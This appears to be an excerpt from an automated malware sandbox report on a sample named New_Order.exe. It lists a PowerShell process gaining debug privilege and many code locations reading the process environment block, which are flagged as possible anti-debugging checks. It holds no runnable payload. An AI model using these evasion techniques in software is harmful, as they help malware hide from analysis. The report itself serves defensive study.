            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B0124 mov eax, dword ptr fs:[00000030h]10_2_012B0124
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01340115 mov eax, dword ptr fs:[00000030h]10_2_01340115
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132A118 mov ecx, dword ptr fs:[00000030h]10_2_0132A118
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132A118 mov eax, dword ptr fs:[00000030h]10_2_0132A118
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132A118 mov eax, dword ptr fs:[00000030h]10_2_0132A118
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132A118 mov eax, dword ptr fs:[00000030h]10_2_0132A118
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov eax, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov ecx, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov eax, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov eax, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov ecx, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov eax, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov eax, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov ecx, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov eax, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E10E mov ecx, dword ptr fs:[00000030h]10_2_0132E10E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01318158 mov eax, dword ptr fs:[00000030h]10_2_01318158
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127C156 mov eax, dword ptr fs:[00000030h]10_2_0127C156
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01314144 mov eax, dword ptr fs:[00000030h]10_2_01314144
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01314144 mov eax, dword ptr fs:[00000030h]10_2_01314144
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01314144 mov ecx, dword ptr fs:[00000030h]10_2_01314144
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01314144 mov eax, dword ptr fs:[00000030h]10_2_01314144
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01314144 mov eax, dword ptr fs:[00000030h]10_2_01314144
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286154 mov eax, dword ptr fs:[00000030h]10_2_01286154
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286154 mov eax, dword ptr fs:[00000030h]10_2_01286154
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C0185 mov eax, dword ptr fs:[00000030h]10_2_012C0185
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130019F mov eax, dword ptr fs:[00000030h]10_2_0130019F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130019F mov eax, dword ptr fs:[00000030h]10_2_0130019F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130019F mov eax, dword ptr fs:[00000030h]10_2_0130019F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130019F mov eax, dword ptr fs:[00000030h]10_2_0130019F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127A197 mov eax, dword ptr fs:[00000030h]10_2_0127A197
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127A197 mov eax, dword ptr fs:[00000030h]10_2_0127A197
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127A197 mov eax, dword ptr fs:[00000030h]10_2_0127A197
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01324180 mov eax, dword ptr fs:[00000030h]10_2_01324180
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01324180 mov eax, dword ptr fs:[00000030h]10_2_01324180
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133C188 mov eax, dword ptr fs:[00000030h]10_2_0133C188
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133C188 mov eax, dword ptr fs:[00000030h]10_2_0133C188
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013561E5 mov eax, dword ptr fs:[00000030h]10_2_013561E5
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B01F8 mov eax, dword ptr fs:[00000030h]10_2_012B01F8
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013461C3 mov eax, dword ptr fs:[00000030h]10_2_013461C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013461C3 mov eax, dword ptr fs:[00000030h]10_2_013461C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE1D0 mov eax, dword ptr fs:[00000030h]10_2_012FE1D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE1D0 mov eax, dword ptr fs:[00000030h]10_2_012FE1D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE1D0 mov ecx, dword ptr fs:[00000030h]10_2_012FE1D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE1D0 mov eax, dword ptr fs:[00000030h]10_2_012FE1D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE1D0 mov eax, dword ptr fs:[00000030h]10_2_012FE1D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01316030 mov eax, dword ptr fs:[00000030h]10_2_01316030
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127A020 mov eax, dword ptr fs:[00000030h]10_2_0127A020
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127C020 mov eax, dword ptr fs:[00000030h]10_2_0127C020
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01304000 mov ecx, dword ptr fs:[00000030h]10_2_01304000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01322000 mov eax, dword ptr fs:[00000030h]10_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01322000 mov eax, dword ptr fs:[00000030h]10_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01322000 mov eax, dword ptr fs:[00000030h]10_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01322000 mov eax, dword ptr fs:[00000030h]10_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01322000 mov eax, dword ptr fs:[00000030h]10_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01322000 mov eax, dword ptr fs:[00000030h]10_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01322000 mov eax, dword ptr fs:[00000030h]10_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01322000 mov eax, dword ptr fs:[00000030h]10_2_01322000
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E016 mov eax, dword ptr fs:[00000030h]10_2_0129E016
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E016 mov eax, dword ptr fs:[00000030h]10_2_0129E016
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E016 mov eax, dword ptr fs:[00000030h]10_2_0129E016
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E016 mov eax, dword ptr fs:[00000030h]10_2_0129E016
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AC073 mov eax, dword ptr fs:[00000030h]10_2_012AC073
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306050 mov eax, dword ptr fs:[00000030h]10_2_01306050
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01282050 mov eax, dword ptr fs:[00000030h]10_2_01282050
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013460B8 mov eax, dword ptr fs:[00000030h]10_2_013460B8
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013460B8 mov ecx, dword ptr fs:[00000030h]10_2_013460B8
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013180A8 mov eax, dword ptr fs:[00000030h]10_2_013180A8
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128208A mov eax, dword ptr fs:[00000030h]10_2_0128208A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012880E9 mov eax, dword ptr fs:[00000030h]10_2_012880E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127A0E3 mov ecx, dword ptr fs:[00000030h]10_2_0127A0E3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013060E0 mov eax, dword ptr fs:[00000030h]10_2_013060E0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127C0F0 mov eax, dword ptr fs:[00000030h]10_2_0127C0F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C20F0 mov ecx, dword ptr fs:[00000030h]10_2_012C20F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013020DE mov eax, dword ptr fs:[00000030h]10_2_013020DE
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA30B mov eax, dword ptr fs:[00000030h]10_2_012BA30B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA30B mov eax, dword ptr fs:[00000030h]10_2_012BA30B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA30B mov eax, dword ptr fs:[00000030h]10_2_012BA30B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127C310 mov ecx, dword ptr fs:[00000030h]10_2_0127C310
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A0310 mov ecx, dword ptr fs:[00000030h]10_2_012A0310
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132437C mov eax, dword ptr fs:[00000030h]10_2_0132437C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01328350 mov ecx, dword ptr fs:[00000030h]10_2_01328350
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0134A352 mov eax, dword ptr fs:[00000030h]10_2_0134A352
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130035C mov eax, dword ptr fs:[00000030h]10_2_0130035C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130035C mov eax, dword ptr fs:[00000030h]10_2_0130035C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130035C mov eax, dword ptr fs:[00000030h]10_2_0130035C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130035C mov ecx, dword ptr fs:[00000030h]10_2_0130035C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130035C mov eax, dword ptr fs:[00000030h]10_2_0130035C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130035C mov eax, dword ptr fs:[00000030h]10_2_0130035C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01302349 mov eax, dword ptr fs:[00000030h]10_2_01302349
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A438F mov eax, dword ptr fs:[00000030h]10_2_012A438F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A438F mov eax, dword ptr fs:[00000030h]10_2_012A438F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E388 mov eax, dword ptr fs:[00000030h]10_2_0127E388
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E388 mov eax, dword ptr fs:[00000030h]10_2_0127E388
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E388 mov eax, dword ptr fs:[00000030h]10_2_0127E388
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01278397 mov eax, dword ptr fs:[00000030h]10_2_01278397
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01278397 mov eax, dword ptr fs:[00000030h]10_2_01278397
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01278397 mov eax, dword ptr fs:[00000030h]10_2_01278397
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B63FF mov eax, dword ptr fs:[00000030h]10_2_012B63FF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E3F0 mov eax, dword ptr fs:[00000030h]10_2_0129E3F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E3F0 mov eax, dword ptr fs:[00000030h]10_2_0129E3F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E3F0 mov eax, dword ptr fs:[00000030h]10_2_0129E3F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013243D4 mov eax, dword ptr fs:[00000030h]10_2_013243D4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013243D4 mov eax, dword ptr fs:[00000030h]10_2_013243D4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012883C0 mov eax, dword ptr fs:[00000030h]10_2_012883C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012883C0 mov eax, dword ptr fs:[00000030h]10_2_012883C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012883C0 mov eax, dword ptr fs:[00000030h]10_2_012883C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012883C0 mov eax, dword ptr fs:[00000030h]10_2_012883C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E3DB mov eax, dword ptr fs:[00000030h]10_2_0132E3DB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E3DB mov eax, dword ptr fs:[00000030h]10_2_0132E3DB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E3DB mov ecx, dword ptr fs:[00000030h]10_2_0132E3DB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E3DB mov eax, dword ptr fs:[00000030h]10_2_0132E3DB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013063C0 mov eax, dword ptr fs:[00000030h]10_2_013063C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133C3CD mov eax, dword ptr fs:[00000030h]10_2_0133C3CD
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127823B mov eax, dword ptr fs:[00000030h]10_2_0127823B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284260 mov eax, dword ptr fs:[00000030h]10_2_01284260
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284260 mov eax, dword ptr fs:[00000030h]10_2_01284260
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284260 mov eax, dword ptr fs:[00000030h]10_2_01284260
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127826B mov eax, dword ptr fs:[00000030h]10_2_0127826B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133A250 mov eax, dword ptr fs:[00000030h]10_2_0133A250
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133A250 mov eax, dword ptr fs:[00000030h]10_2_0133A250
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286259 mov eax, dword ptr fs:[00000030h]10_2_01286259
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01308243 mov eax, dword ptr fs:[00000030h]10_2_01308243
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01308243 mov ecx, dword ptr fs:[00000030h]10_2_01308243
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127A250 mov eax, dword ptr fs:[00000030h]10_2_0127A250
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902A0 mov eax, dword ptr fs:[00000030h]10_2_012902A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902A0 mov eax, dword ptr fs:[00000030h]10_2_012902A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov ecx, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE284 mov eax, dword ptr fs:[00000030h]10_2_012BE284
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE284 mov eax, dword ptr fs:[00000030h]10_2_012BE284
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01300283 mov eax, dword ptr fs:[00000030h]10_2_01300283
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01300283 mov eax, dword ptr fs:[00000030h]10_2_01300283
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01300283 mov eax, dword ptr fs:[00000030h]10_2_01300283
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902E1 mov eax, dword ptr fs:[00000030h]10_2_012902E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902E1 mov eax, dword ptr fs:[00000030h]10_2_012902E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902E1 mov eax, dword ptr fs:[00000030h]10_2_012902E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01316500 mov eax, dword ptr fs:[00000030h]10_2_01316500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B656A mov eax, dword ptr fs:[00000030h]10_2_012B656A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B656A mov eax, dword ptr fs:[00000030h]10_2_012B656A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B656A mov eax, dword ptr fs:[00000030h]10_2_012B656A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288550 mov eax, dword ptr fs:[00000030h]10_2_01288550
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288550 mov eax, dword ptr fs:[00000030h]10_2_01288550
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013005A7 mov eax, dword ptr fs:[00000030h]10_2_013005A7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013005A7 mov eax, dword ptr fs:[00000030h]10_2_013005A7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013005A7 mov eax, dword ptr fs:[00000030h]10_2_013005A7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A45B1 mov eax, dword ptr fs:[00000030h]10_2_012A45B1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A45B1 mov eax, dword ptr fs:[00000030h]10_2_012A45B1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B4588 mov eax, dword ptr fs:[00000030h]10_2_012B4588
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01282582 mov eax, dword ptr fs:[00000030h]10_2_01282582
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01282582 mov ecx, dword ptr fs:[00000030h]10_2_01282582
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE59C mov eax, dword ptr fs:[00000030h]10_2_012BE59C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC5ED mov eax, dword ptr fs:[00000030h]10_2_012BC5ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC5ED mov eax, dword ptr fs:[00000030h]10_2_012BC5ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012825E0 mov eax, dword ptr fs:[00000030h]10_2_012825E0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
